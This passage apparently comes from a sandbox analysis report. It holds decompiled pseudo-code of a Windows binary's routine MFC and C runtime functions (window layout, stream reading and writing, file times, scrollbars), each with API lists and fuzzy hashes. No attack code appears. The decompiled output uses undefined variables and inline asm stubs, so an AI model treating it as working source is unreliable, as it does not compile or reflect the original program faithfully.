                  					 *(_t107 + 0x84) =  *(_t107 + 0x84) & 0xfffffff9;
                  					_t65 =  *(_t139 + 0x84) & 0x00000006 |  *(_t107 + 0x84);
                  					 *(_t107 + 0x84) = _t65;
                  					_t157 = _t65 & 0x00000040;
                  					if((_t65 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v268);
                  						E00412D87(_t107, _t139, _t133, _t135, _t139, _t157);
                  						E0041FC5A(_t139, _t133,  *((intOrPtr*)(_t107 + 0x20)),  &_v268);
                  					}
                  					_t70 = ( *(_t139 + 0x84) ^  *(_t107 + 0x84)) & 0x0000f000 ^  *(_t139 + 0x84) | 0x00000f00;
                  					if( *((intOrPtr*)(_t107 + 0x98)) == 0) {
                  						_t71 = _t70 & 0xfffffffe;
                  						__eflags = _t70 & 0xfffffffe;
                  					} else {
                  						_t71 = _t70 | 0x00000001;
                  					}
                  					E00420D66(_t139, _t71);
                  					_t136 = E004135F7(_t107, GetDlgCtrlID( *(_t139 + 0x20)), 0xffffffff);
                  					if(_t136 > 0) {
                  						 *((intOrPtr*)(E0040B917(_t107 + 0x9c, _t136))) = _t139;
                  					}
                  					if(_v292 == 0) {
                  						__eflags = _t136 - 1;
                  						if(_t136 < 1) {
                  							_t136 = _t107 + 0x9c;
                  							E004133A2(_t107 + 0x9c, _t139);
                  							E004133A2(_t107 + 0x9c, 0);
                  						}
                  						_t113 =  *0x466524; // 0x2
                  						_push(0x115);
                  						__eflags = 0;
                  						_push(0);
                  						_push(0);
                  						_push( ~_t113);
                  						_t115 =  *0x466520; // 0x2
                  						_push( ~_t115);
                  						_push(0);
                  					} else {
                  						E00413342( &_v284, _v292);
                  						E00422BFB(_t107,  &_v284);
                  						if(_t136 < 1) {
                  							asm("cdq");
                  							asm("cdq");
                  							_push((_v272 - _v280 - _t133 >> 1) + _v280);
                  							_push((_v276 - _v284 - _t133 >> 1) + _v284);
                  							_t136 = _t146 - 0x10;
                  							_push(_v288);
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							asm("movsd");
                  							E0041365C(_t107);
                  							_t139 = _v288;
                  						}
                  						_push(0x114);
                  						_push(_v272 - _v280);
                  						_push(_v276 - _v284);
                  						_push(_v280);
                  						_push(_v284);
                  						_push(0);
                  					}
                  					E00412D05(_t139);
                  					if(E0040EE3C(_t107, _t139, GetParent( *(_t139 + 0x20))) != _t107) {
                  						E004133D6(_t139, _t107);
                  					}
                  					_t118 =  *((intOrPtr*)(_t139 + 0x90));
                  					if( *((intOrPtr*)(_t139 + 0x90)) != 0) {
                  						E00413A2C(_t118, _t136, _t139, 0xffffffff, 0);
                  					}
                  					 *((intOrPtr*)(_t139 + 0x90)) = _t107;
                  					 *(E00408487(_t107) + 0xe4) =  *(_t62 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t137);
                  				_pop(_t140);
                  				_pop(_t108);
                  				return E00430650(_t62, _t108, _v8 ^ _t143, _t133, _t137, _t140);
                  			}































                  APIs
                  • GetWindowRect.USER32 ref: 0041447D
                  • EqualRect.USER32 ref: 0041449B
                  • GetDlgCtrlID.USER32 ref: 00414540
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00412D05: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,0040E9F3,?,?,0040E9F3,00000000,?,?,000000FF,000000FF,00000015), ref: 00412D2D
                  • GetParent.USER32(?), ref: 00414658
                    • Part of subcall function 004133D6: SetParent.USER32(?,?,?,004143C0,?,00000000), ref: 004133E9
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ParentRectWindow$CtrlEqualException@8H_prolog3Throw
                  • String ID:
                  • API String ID: 295898562-0
                  • Opcode ID: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction ID: ba48c219f6f1ad370f563cc23c44ecb0e53aac9f91ee0a06091b5b2abe8ce970
                  • Opcode Fuzzy Hash: 76ee73155ad020e3b4c5c133681f73e4c7979e435b41cc8632fa123f0ed9ab9c
                  • Instruction Fuzzy Hash: 0F61D5716001199FCB24DF29CD42BEA77B5BF85304F0401AEEA5ED7291DF789E818B58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E004482FB(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
                  				signed int _t52;
                  				void* _t54;
                  				void* _t58;
                  				intOrPtr _t61;
                  				signed int _t67;
                  				void* _t106;
                  				void* _t130;
                  
                  				_t123 = __edi;
                  				_t122 = __edx;
                  				_t95 = __ebx;
                  				_push(0x58);
                  				E00431B04(E0044CB8F, __ebx, __edi, __esi);
                  				_t129 = __ecx;
                  				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
                  					_t52 =  *(_t129 + 0x4c);
                  					__eflags = _t52;
                  					if(_t52 != 0) {
                  						__eflags =  *(_t129 + 0x3c);
                  						if(__eflags != 0) {
                  							E00447F37(_t130 - 0x2c);
                  							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
                  							while(1) {
                  								_push( *(_t129 + 0x4c));
                  								_t54 = E004499A8(_t95, _t122, _t123, _t129, __eflags);
                  								__eflags = _t54 - 0xffffffff;
                  								if(_t54 == 0xffffffff) {
                  									break;
                  								}
                  								E00448268(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
                  								_t58 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x44));
                  								_t95 = _t58;
                  								_t61 = E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x64));
                  								_t122 =  *( *(_t129 + 0x3c));
                  								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
                  								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
                  								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
                  								__eflags = _t67;
                  								if(_t67 < 0) {
                  									break;
                  								} else {
                  									_t123 = 1;
                  									__eflags = _t67 - 1;
                  									if(_t67 <= 1) {
                  										_t106 = _t130 - 0x2c;
                  										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
                  										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
                  											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E0044794F(E0044818F(_t106, _t130 - 0x54));
                  											while(1) {
                  												__eflags = _t123;
                  												if(_t123 <= 0) {
                  													goto L23;
                  												}
                  												_push( *(_t129 + 0x4c));
                  												_t123 = _t123 - 1;
                  												__eflags = _t123;
                  												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
                  												E00442D62(_t95, _t122, _t123, _t129, _t123);
                  											}
                  											goto L23;
                  										} else {
                  											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c));
                  											E004020E0(_t130 - 0x2c, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E0044794F(E0044818F(_t106, _t130 - 0x5c)));
                  											continue;
                  										}
                  									} else {
                  										__eflags = _t67 - 3;
                  										if(_t67 != 3) {
                  											break;
                  										} else {
                  											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
                  											if(__eflags < 0) {
                  												continue;
                  											} else {
                  												E0043065F(_t95, _t83, _t130 - 0x2d, 1, E0044794F(E0044818F(_t130 - 0x2c, _t130 - 0x4c)), 1);
                  												L23:
                  												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
                  											}
                  										}
                  									}
                  								}
                  								L19:
                  								E00402090(_t130 - 0x2c, _t130, 1, 0);
                  								goto L3;
                  							}
                  							__eflags = _t129;
                  							goto L19;
                  						} else {
                  							_t52 = E00447F77(__eflags, _t130 - 0x2d, _t52);
                  							__eflags = _t52;
                  							if(_t52 == 0) {
                  								goto L5;
                  							} else {
                  							}
                  						}
                  					} else {
                  						L5:
                  					}
                  				} else {
                  					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                  					_t129 =  *(__ecx + 0x20);
                  					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
                  				}
                  				L3:
                  				return E00431B87(_t95, _t123, _t129);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00448302
                  • _fgetc.LIBCMT ref: 00448438
                    • Part of subcall function 00448268: std::_String_base::_Xlen.LIBCPMT ref: 0044827E
                  • _memcpy_s.LIBCMT ref: 004483FD
                  • _ungetc.LIBCMT ref: 00448483
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                  • String ID:
                  • API String ID: 9762108-0
                  • Opcode ID: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction ID: 6b1c3ca6e5d9ee48176232dde700f32502ceeb77f090096f39552806af3b4032
                  • Opcode Fuzzy Hash: e359a7babec4b74aa147af3afe432c765d51cbf57e171d97458ca66c2306e3e0
                  • Instruction Fuzzy Hash: 1351B1729046099FEB14EFB5C8529EEB3B9AF08314B50451FE452E7291EF38E905CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00449CB6(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t59;
                  				intOrPtr* _t61;
                  				signed int _t63;
                  				void* _t68;
                  				signed int _t69;
                  				signed int _t72;
                  				signed int _t74;
                  				signed int _t75;
                  				signed int _t77;
                  				signed int _t78;
                  				signed int _t81;
                  				signed int _t82;
                  				signed int _t84;
                  				signed int _t88;
                  				signed int _t97;
                  				signed int _t98;
                  				signed int _t99;
                  				intOrPtr* _t100;
                  				void* _t101;
                  
                  				_t90 = __edx;
                  				if(_a8 == 0 || _a12 == 0) {
                  					L4:
                  					return 0;
                  				} else {
                  					_t100 = _a16;
                  					_t105 = _t100;
                  					if(_t100 != 0) {
                  						_t82 = _a4;
                  						__eflags = _t82;
                  						if(__eflags == 0) {
                  							goto L3;
                  						}
                  						_t63 = _t59 | 0xffffffff;
                  						_t90 = _t63 % _a8;
                  						__eflags = _a12 - _t63 / _a8;
                  						if(__eflags > 0) {
                  							goto L3;
                  						}
                  						_t97 = _a8 * _a12;
                  						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                  						_v8 = _t82;
                  						_v16 = _t97;
                  						_t81 = _t97;
                  						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                  							_v12 = 0x1000;
                  						} else {
                  							_v12 =  *(_t100 + 0x18);
                  						}
                  						__eflags = _t97;
                  						if(_t97 == 0) {
                  							L32:
                  							return _a12;
                  						} else {
                  							do {
                  								_t84 =  *(_t100 + 0xc) & 0x00000108;
                  								__eflags = _t84;
                  								if(_t84 == 0) {
                  									L18:
                  									__eflags = _t81 - _v12;
                  									if(_t81 < _v12) {
                  										_t68 = E0043681F(_t90, _t97,  *_v8, _t100);
                  										__eflags = _t68 - 0xffffffff;
                  										if(_t68 == 0xffffffff) {
                  											L34:
                  											_t69 = _t97;
                  											L35:
                  											return (_t69 - _t81) / _a8;
                  										}
                  										_v8 = _v8 + 1;
                  										_t72 =  *(_t100 + 0x18);
                  										_t81 = _t81 - 1;
                  										_v12 = _t72;
                  										__eflags = _t72;
                  										if(_t72 <= 0) {
                  											_v12 = 1;
                  										}
                  										goto L31;
                  									}
                  									__eflags = _t84;
                  									if(_t84 == 0) {
                  										L21:
                  										__eflags = _v12;
                  										_t98 = _t81;
                  										if(_v12 != 0) {
                  											_t75 = _t81;
                  											_t90 = _t75 % _v12;
                  											_t98 = _t98 - _t75 % _v12;
                  											__eflags = _t98;
                  										}
                  										_push(_t98);
                  										_push(_v8);
                  										_push(E004401F2(_t90, _t98, _t100));
                  										_t74 = E0043FEB4(_t81, _t90, _t98, _t100, __eflags);
                  										_t101 = _t101 + 0xc;
                  										__eflags = _t74 - 0xffffffff;
                  										if(_t74 == 0xffffffff) {
                  											L36:
                  											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                  											_t69 = _v16;
                  											goto L35;
                  										} else {
                  											_t88 = _t98;
                  											__eflags = _t74 - _t98;
                  											if(_t74 <= _t98) {
                  												_t88 = _t74;
                  											}
                  											_v8 = _v8 + _t88;
                  											_t81 = _t81 - _t88;
                  											__eflags = _t74 - _t98;
                  											if(_t74 < _t98) {
                  												goto L36;
                  											} else {
                  												L27:
                  												_t97 = _v16;
                  												goto L31;
                  											}
                  										}
                  									}
                  									_t77 = E0044384A(_t100);
                  									__eflags = _t77;
                  									if(_t77 != 0) {
                  										goto L34;
                  									}
                  									goto L21;
                  								}
                  								_t78 =  *(_t100 + 4);
                  								__eflags = _t78;
                  								if(__eflags == 0) {
                  									goto L18;
                  								}
                  								if(__eflags < 0) {
                  									_t48 = _t100 + 0xc;
                  									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                  									__eflags =  *_t48;
                  									goto L34;
                  								}
                  								_t99 = _t81;
                  								__eflags = _t81 - _t78;
                  								if(_t81 >= _t78) {
                  									_t99 = _t78;
                  								}
                  								E004311E0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                  								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                  								 *_t100 =  *_t100 + _t99;
                  								_t101 = _t101 + 0xc;
                  								_t81 = _t81 - _t99;
                  								_v8 = _v8 + _t99;
                  								goto L27;
                  								L31:
                  								__eflags = _t81;
                  							} while (_t81 != 0);
                  							goto L32;
                  						}
                  					}
                  					L3:
                  					_t61 = E00431D3E(_t105);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					 *_t61 = 0x16;
                  					E004367E9(_t90, 0, _t100);
                  					goto L4;
                  				}
                  			}






























                  APIs
                  • __flush.LIBCMT ref: 00449D7A
                  • __fileno.LIBCMT ref: 00449D9A
                  • __locking.LIBCMT ref: 00449DA1
                  • __flsbuf.LIBCMT ref: 00449DCC
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                    • Part of subcall function 004367E9: __decode_pointer.LIBCMT ref: 004367F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                  • String ID:
                  • API String ID: 3240763771-0
                  • Opcode ID: 020bed942e4c04a7e15a2f7b9b15e5e92c61f2d39ae54c637c43a2076e74116d
                  • Instruction ID: d56e0beb57539500931c0ee6668ff06c45bf35cc77231a46e76c3665acdb6bc3
                  • Opcode Fuzzy Hash: 020bed942e4c04a7e15a2f7b9b15e5e92c61f2d39ae54c637c43a2076e74116d
                  • Instruction Fuzzy Hash: AE41C271A00605ABFF24DF69C88559FB7B6EF80364F24852FE42597280E778DE41EB48
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E0042E41C(void* __ebx, void* __ecx, void* __eflags, signed int* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				char _v20;
                  				struct _FILETIME _v28;
                  				struct _FILETIME _v36;
                  				char _v44;
                  				void* __edi;
                  				void* __esi;
                  				void* _t56;
                  				signed int* _t60;
                  				signed int* _t82;
                  				signed int* _t85;
                  				signed int* _t88;
                  				struct _FILETIME* _t94;
                  				void* _t106;
                  				CHAR* _t107;
                  				signed int* _t108;
                  				void* _t112;
                  
                  				_t91 = __ecx;
                  				_t108 = _a4;
                  				_t106 = __ecx;
                  				E00431160(__ecx, _t108, 0, 0x128);
                  				E004048ED(__ebx, _t91, _t106, _t108,  &(_t108[8]), 0x104,  *(_t106 + 0xc), 0xffffffff);
                  				_t56 =  *(_t106 + 4);
                  				_t112 = _t56 -  *0x4542f8; // 0xffffffff
                  				if(_t112 == 0) {
                  					L20:
                  					return 1;
                  				}
                  				_t94 =  &_v20;
                  				if(GetFileTime(_t56, _t94,  &_v28,  &_v36) != 0) {
                  					_t60 =  &_v12;
                  					__imp__GetFileSizeEx( *(_t106 + 4), _t60);
                  					if(_t60 == 0) {
                  						goto L2;
                  					}
                  					_t108[6] = _v12;
                  					_t108[7] = _v8;
                  					_t107 =  *(_t106 + 0xc);
                  					if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
                  						_t108[8] = (_t94 & 0xffffff00 | GetFileAttributesA(_t107) == 0xffffffff) - 0x00000001 & _t64;
                  					} else {
                  						_t108[8] = 0;
                  					}
                  					if(E0042DF81( &_v20) == 0) {
                  						 *_t108 =  *_t108 & 0x00000000;
                  						_t108[1] = _t108[1] & 0x00000000;
                  					} else {
                  						_t88 = E0042E0A4( &_v44,  &_v20, 0xffffffff);
                  						 *_t108 =  *_t88;
                  						_t108[1] = _t88[1];
                  					}
                  					if(E0042DF81( &_v28) == 0) {
                  						_t108[4] = 0;
                  						_t108[5] = 0;
                  					} else {
                  						_t85 = E0042E0A4( &_v44,  &_v28, 0xffffffff);
                  						_t108[4] =  *_t85;
                  						_t108[5] = _t85[1];
                  					}
                  					if(E0042DF81( &_v36) == 0) {
                  						_t108[2] = 0;
                  						_t108[3] = 0;
                  					} else {
                  						_t82 = E0042E0A4( &_v44,  &_v36, 0xffffffff);
                  						_t108[2] =  *_t82;
                  						_t108[3] = _t82[1];
                  					}
                  					if(( *_t108 | _t108[1]) == 0) {
                  						 *_t108 = _t108[2];
                  						_t108[1] = _t108[3];
                  					}
                  					if((_t108[4] | _t108[5]) == 0) {
                  						_t108[4] = _t108[2];
                  						_t108[5] = _t108[3];
                  					}
                  					goto L20;
                  				}
                  				L2:
                  				return 0;
                  			}






















                  APIs
                  • _memset.LIBCMT ref: 0042E433
                    • Part of subcall function 004048ED: __cftof.LIBCMT ref: 004048FE
                  • GetFileTime.KERNEL32(?,?,?,?), ref: 0042E46A
                  • GetFileSizeEx.KERNEL32(?,?), ref: 0042E482
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: File$SizeTime__cftof_memset
                  • String ID:
                  • API String ID: 2749391713-0
                  • Opcode ID: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction ID: 59e65bddb89cb08a79970d6891d001c7148b8aeecaf6f385f6588ba968201997
                  • Opcode Fuzzy Hash: b88261758d1912e9b31fa23ff3f45a79f7e15a6fac39cb4cba046ca838f71c23
                  • Instruction Fuzzy Hash: 5D517071A00615AFCB20DF66D840D9BB7F4BF08324B448A2EE5A6D3690E734E545CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E0041C15A(void* __ecx, int _a4, int _a8, int _a12) {
                  				intOrPtr _v16;
                  				signed int _v20;
                  				signed int _v24;
                  				intOrPtr _v28;
                  				char _v32;
                  				intOrPtr _t62;
                  				intOrPtr _t63;
                  				intOrPtr* _t71;
                  				intOrPtr _t78;
                  				intOrPtr* _t81;
                  				signed short _t100;
                  				void* _t109;
                  				signed int _t112;
                  				int* _t113;
                  				void* _t117;
                  
                  				_t117 = __ecx;
                  				_push(0);
                  				if( *((intOrPtr*)(__ecx + 0x10c)) != 0) {
                  					_t62 =  *((intOrPtr*)(__ecx + 0xb0));
                  					_t112 = _a4 * 0x28;
                  					 *(__ecx + 0x118) = 1;
                  					 *((intOrPtr*)(_t62 + 0x20)) =  *((intOrPtr*)(_t62 + _t112 + 0x20));
                  					 *((intOrPtr*)(_t62 + 0x24)) =  *((intOrPtr*)(_t62 + _t112 + 0x24));
                  					_t63 =  *((intOrPtr*)(__ecx + 0xb0));
                  					 *((intOrPtr*)(_t63 + 0x10)) =  *((intOrPtr*)(_t63 + _t112 + 0x10));
                  					 *((intOrPtr*)(_t63 + 0x14)) =  *((intOrPtr*)(_t63 + _t112 + 0x14));
                  					_push( *((intOrPtr*)(__ecx + 0x114)) + _a4);
                  					E0041BAC8(__ecx);
                  					E0041B7FA(__ecx, __eflags, 0);
                  					_t113 = _t112 +  *((intOrPtr*)(_t117 + 0xb0)) + 0x18;
                  					_a8 = MulDiv(_a8,  *_t113, _t113[1]);
                  					_a12 = MulDiv(_a12,  *_t113, _t113[1]);
                  					_t71 =  *((intOrPtr*)(_t117 + 0xb0));
                  					_a12 = _a12 +  *((intOrPtr*)(_t71 + 4));
                  					_t59 =  &_a8;
                  					 *_t59 = _a8 +  *_t71;
                  					__eflags =  *_t59;
                  					return E004195B7(_t117, _t109, _a8, _a12);
                  				}
                  				 *(__ecx + 0x118) =  *(__ecx + 0x108);
                  				ShowScrollBar( *(__ecx + 0x20), 0, ??);
                  				_t78 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x134)))) + 0x74));
                  				_t100 =  *(_t78 + 0x1e) & 0x0000ffff;
                  				if(_t100 >= 0x8000) {
                  					L3:
                  					_a4 = 0;
                  					L4:
                  					ShowScrollBar( *(_t117 + 0x20), 1, _a4);
                  					if(_a4 != 0) {
                  						_t81 =  *((intOrPtr*)(_t117 + 0x134));
                  						_v28 = 3;
                  						_v24 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1c) & 0x0000ffff;
                  						_v20 =  *( *((intOrPtr*)( *_t81 + 0x74)) + 0x1e) & 0x0000ffff;
                  						_v16 = 1;
                  						if(E0040CE62(_t117, 1,  &_v32, 0) == 0) {
                  							E0040DAD4(_t117, 1, _v24, _v20, 0);
                  						}
                  					}
                  					return E0041BAC8(_t117,  *((intOrPtr*)(_t117 + 0x114)), 1);
                  				}
                  				_a4 = 1;
                  				if((_t100 & 0x0000ffff) - ( *(_t78 + 0x1c) & 0x0000ffff) <= 0x7fff) {
                  					goto L4;
                  				}
                  				goto L3;
                  			}

                  APIs
                  • ShowScrollBar.USER32(?,00000000,00000000), ref: 0041C18C
                  • ShowScrollBar.USER32(?,00000001,?), ref: 0041C1CA
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C299
                  • MulDiv.KERNEL32(?,?,?), ref: 0041C2A6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ScrollShow
                  • String ID:
                  • API String ID: 3611344627-0
                  • Opcode ID: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction ID: bf8b80c232955c01bad76bb884e3b34b9d27a71a0442df1df84a360057f59a7a
                  • Opcode Fuzzy Hash: 2d2a39918026b51e9e54ad1d2bd2ee466984f5a2fb341d35fe6ca703a947cfa3
                  • Instruction Fuzzy Hash: CF416674600604AFCB15DF69C880AAABBF6FF48304F00456EF85A9B361D774E990DF94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0042BCDF(void* __ebx, signed int __ecx, void* __edx, int __edi, void* __esi, void* __eflags) {
                  				signed int _t44;
                  				signed int _t46;
                  				long _t54;
                  				char* _t60;
                  				void* _t65;
                  				signed int _t72;
                  				intOrPtr _t73;
                  				char* _t80;
                  				signed int _t83;
                  				signed int _t91;
                  				char* _t93;
                  				void* _t94;
                  
                  				_t89 = __edi;
                  				_t88 = __edx;
                  				_push(8);
                  				E00431A9B(E0044C7FD, __ebx, __edi, __esi);
                  				_t91 = __ecx;
                  				 *(_t94 - 0x14) = 0;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					_t72 =  *(__ecx + 0x74);
                  					__eflags =  *(_t72 + 0x34) & 0x00080000;
                  					if(( *(_t72 + 0x34) & 0x00080000) == 0) {
                  						L14:
                  						_t44 =  *(_t91 + 0x1d4);
                  						__eflags = _t44;
                  						if(_t44 == 0) {
                  							__eflags =  *(_t72 + 0x3a);
                  							if(__eflags != 0) {
                  								_t91 = _t72;
                  								_t73 =  *((intOrPtr*)(_t94 + 8));
                  								goto L21;
                  							} else {
                  								_t73 =  *((intOrPtr*)(_t94 + 8));
                  								_push(0x44f0f5);
                  							}
                  						} else {
                  							_t73 =  *((intOrPtr*)(_t94 + 8));
                  							__eflags =  *(_t44 + 0x3a);
                  							if(__eflags != 0) {
                  								_t91 = _t44;
                  								L21:
                  								_t46 = ( *(_t91 + 0x3a) & 0x0000ffff) +  *((intOrPtr*)(_t91 + 0x1c));
                  								__eflags = _t46;
                  								_push(_t46);
                  							} else {
                  								_push(0x44f0f5);
                  							}
                  						}
                  						E00406039(0, _t73, _t88, _t89, _t91, __eflags);
                  					} else {
                  						__eflags =  *(__ecx + 0x20);
                  						if( *(__ecx + 0x20) == 0) {
                  							goto L14;
                  						} else {
                  							E004014C0(_t94 - 0x10, __edx);
                  							_t89 = 0x104;
                  							 *((intOrPtr*)(_t94 - 4)) = 3;
                  							 *(_t94 - 0x14) = E004014F0(_t94 - 0x10, 0x104);
                  							_t54 = SendMessageA( *(E0040EE3C(0, _t94 - 0x10, GetParent( *(_t91 + 0x20))) + 0x20), 0x464, 0x104,  *(_t94 - 0x14));
                  							E0040A356(_t94 - 0x10, 0xffffffff);
                  							__eflags = _t54;
                  							if(__eflags < 0) {
                  								goto L9;
                  							} else {
                  								goto L5;
                  							}
                  							L24:
                  						}
                  					}
                  				} else {
                  					E004014C0(_t94 - 0x10, __edx);
                  					 *((intOrPtr*)(_t94 - 4)) = 0;
                  					_t83 = _t91;
                  					_push(_t94 - 0x14);
                  					_t97 =  *(_t91 + 0x20);
                  					if( *(_t91 + 0x20) == 0) {
                  						_t65 = E0042BA2F(0, _t83, __edx, __edi, _t91, __eflags);
                  						 *((char*)(_t94 - 4)) = 2;
                  					} else {
                  						_t65 = E0042BBEC(0, _t83, __edx, __edi, _t91, _t97);
                  						 *((char*)(_t94 - 4)) = 1;
                  					}
                  					E004056C2(0, _t94 - 0x10, _t65);
                  					 *((char*)(_t94 - 4)) = 0;
                  					E004010B0( *(_t94 - 0x14) + 0xfffffff0, _t88);
                  					E0040A356(_t94 - 0x10, 0xffffffff);
                  					L5:
                  					_t93 =  *(_t94 - 0x10);
                  					_t60 = PathFindExtensionA(_t93);
                  					if(_t60 == 0 ||  *_t60 != 0x2e) {
                  						L9:
                  						E00401E30(_t94 - 0x10);
                  						E00405562( *((intOrPtr*)(_t94 + 8)), __eflags, _t94 - 0x10);
                  						_t80 =  &(( *(_t94 - 0x10))[0xfffffffffffffff0]);
                  					} else {
                  						_push( &(_t60[1]));
                  						E00406039(0,  *((intOrPtr*)(_t94 + 8)), _t88, _t89, _t93,  &(_t60[1]));
                  						_t80 = _t93 - 0x10;
                  					}
                  					E004010B0(_t80, _t88);
                  				}
                  				return E00431B73( *((intOrPtr*)(_t94 + 8)));
                  				goto L24;
